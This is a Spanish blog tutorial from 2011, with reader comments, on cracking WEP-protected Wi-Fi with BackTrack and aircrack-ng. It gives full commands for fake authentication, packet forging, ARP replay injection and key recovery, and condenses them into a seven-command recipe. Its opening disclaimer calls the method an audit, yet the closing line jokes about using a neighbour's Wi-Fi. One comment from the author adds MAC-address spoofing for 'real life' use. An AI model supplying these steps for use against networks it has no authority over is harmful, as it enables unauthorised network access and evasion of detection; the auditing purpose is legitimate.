15 ago 2011

Crackear WEP

Antes de empezar con el tutorial decir que saltarse redes WiFi con algún tipo de cifrado es un delito, y lo que aquí muestra Jordi es un tutorial de como probar la seguridad, auditoría, en nuestras redes WiFi, disfrutad del tutorial.

Hoy os vamos a mostrar  una de las infinitas utilidades de Backtrack, concretamente la de vulnerar el protocolo WEP de las wifis. Como muchos ya sabréis, todavía a día de hoy gran parte de los routers cedidos por las ISP traen la wifi activada, y lo que es peor, protegida con una simple contraseña WEP. Veremos lo fácil que resulta vulnerarla.

Para empezar arrancaremos nuestra BT, en este caso en su cuarta versión desde una máquina virtual o directamente desde el Live cd.

 

Startx

“Arrancando la interfaz gráfica tras el login”

Ahora  abriremos una shell y con el comando iwconfig pondremos nuestra tarjeta de red en modo Monitor y le bajaremos el rate a 1Mb.

 

[caption id="attachment_3986" align="aligncenter" width="453" caption="rate a 1M"][/caption]

Teniendo ya nuestra tarjeta de red preparada, procederemos a la caza de una red inalámbrica poco segura. Para ello utilizaremos el comando airodump-ng que nos muestra entre otras cosas todas las redes wifi cercanas a nosotros.

 

Airodump

Una vez elegida la wifi a explotar, apuntaremos el BBSID y el canal de la misma ya que los vamos a necesitar en varias ocasiones durante la prueba. Tras indicar a nuestra interface de red el canal concreto con el comando “iwconfig wlan0 channel 8”  ¡ya estamos listos para empezar!

El primer paso consiste en hacer una falsa asociación de nuestro equipo con el router. Para ello  utilizaremos el potencial de aireplay-ng y su atributo -1 con el que lograremos ésa autentificación:

aireplay-ng -1 0 -a BSSID -h LOCALMAC INT

Donde INT es el nombre de nustra interface de red, en este caso Wlan0

Una vez autentificados en la red, crearemos un paquete válido para posteriormente ser reinyectado y así generar tráfico.

aireplay-ng -5 -b BSSID -h LOCALMAC INT

 

[caption id="attachment_3991" align="aligncenter" width="443" caption="Packet"][/caption]

Con éste segundo comando y tras encontrar un paquete válido nos pedirá confirmación, que se la daremos con Y y el enter. Inmediatamente después de indicarle que “si queremos usar ese paquete”, en la ventana de la Shell nos aparecerá un mensaje diciéndonos que se ha creado un nuevo archivo con extensión .xor.

 

[caption id="attachment_3994" align="aligncenter" width="494" caption="xor Create"][/caption]

Por último y antes de empezar a generar tráfico  “falso” en nuestra wifi crearemos el paquete mágico con la siguiente orden:

packetforge-ng -0 -a BSSID -h LOCALMAC -k 255.255.255.255 -l

255.255.255.255 -y Nombre_del_archivo_creado.xor -w arp-request

Finalmente y tras la respuesta que nos indica que se ha escrito el paquete en arp-request, vamos a la parte importante de todo esto!

Abrimos tres pestañas diferentes de shell pues ahora necesitaremos que se ejecuten 3 órdenes de manera paralela.

En la primera de ellas dejaremos nuestro ordenador capturando todo el tráfico que pase por el canal específico de nuestra wifi con la siguiente orden:

airodump-ng -c CH -w capture INT

 

Capturing

En la segunda de ellas inyectaremos concretamente el paquete que estamos creando durante los últimos pasos con el comando:

aireplay-ng -2 -r arp-request INT

reutilizando

Y por último en la tercera shell abriremos Aircrack-ng para crackear todo el tráfico que estamos generando con el fin de descubrir la contraseña de la red inalámbrica.

[caption id="attachment_4003" align="aligncenter" width="492" caption="Cracking"][/caption]

Tras escoger la wlan deseada, solamente tendremos que esperar.  En cuestión de minutos tendremos la contraseña en pantalla.

 

[caption id="attachment_4005" align="aligncenter" width="492" caption="Found Pass!"] 
[/caption]

Aunque os haya parecido algo bastante largo y complicado es un proceso que se puede llevar a cabo  en menos de 10 minutos. En realidad todo ello  se puede simplificar en 7 simples comandos que aquí os resumo:

  1. Iwconfig INT mode monitor rate 1M channel CH
  2. aireplay-ng -1 0 -a BSSID -h LOCALMAC INT
  3. aireplay-ng -4 INT -h LOCALMAC
  4. packetforge-ng -0 -a BSSID -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y NOMDELXORCREAT.xor -w arp-request
  5. airodump-ng -c CH -w capture INT
  6. aireplay-ng -2 -r arp-request INT
  7. aircrack-ng -z *.cap

Vosotros ya os conectáis a la wifi de vuestro vecino en menos de 10 minutos?

10 comentarios:

  1. Muy buen tutorial =) se agradecen la explicaciones de cada comando y de sus parámetros =)

    ResponderEliminar
  2. Gracias Iker, espero que te sea útil :)

    ResponderEliminar
  3. Si bien en la vida real se usa bastante, esto pretendía ser una prueba de concepto para testear nuestra wifi local.De todas formas si se desea hacer es tan sencillo como:- ifconfig INT down (desactivar tarjeta de red)- macchanger -m 00:11:22:33:44:55 INTy ya tendríamos la MAC cambiada a 00:11:22:33:44:55También podemos utilizar los atributos -A o -R para establecer una MAC aleatoria.Por último añadir que, con el comando ifconfig también podemos cambiar la dirección física de la tajeta de red:- ifconfig INT hw ether 00:01:02:03:04:05Espero que esto responda tu comentario Juan :)

    ResponderEliminar
  4. antes de echar a andar el BackTrack como hago para que un vmeare player use la tarjeta wireless? porque wmware no sale con wireless, siempre te la marca como eth0

    ResponderEliminar
  5. En lo personal normalmente lo uso directamente desde live CD para evitar problemas de red con las tarjetas wifi y usar toda la ram y procesador en Backtrack, por lo que ahora mismo no sabría responderte. Me lo miro y te comento algo mañana :)

    ResponderEliminar
  6. [...] SOURCE Tagged with: Cracking • Redes • Seguridad • Wep  If you enjoyed this article, please consider sharing it! [...]

    ResponderEliminar
  7. pondremos nuestra tarjeta de red en modo Monitor y le bajaremos el rate a 1Mb?? porque???????

    ResponderEliminar
  8. A 54Mbps he tenido bastantes problemas para crackear una clave WEP, sobretodo a la hora de crear el paquete. Para reinyectarlo y generar tráfico no. Puedes probarlo sin bajarle el rate a 1 a ver si a ti te funciona.El modo monitor se pone para escuchar los paquetes que viajan cerca de nuestra tarjeta wifi y poder capturarlos.

    ResponderEliminar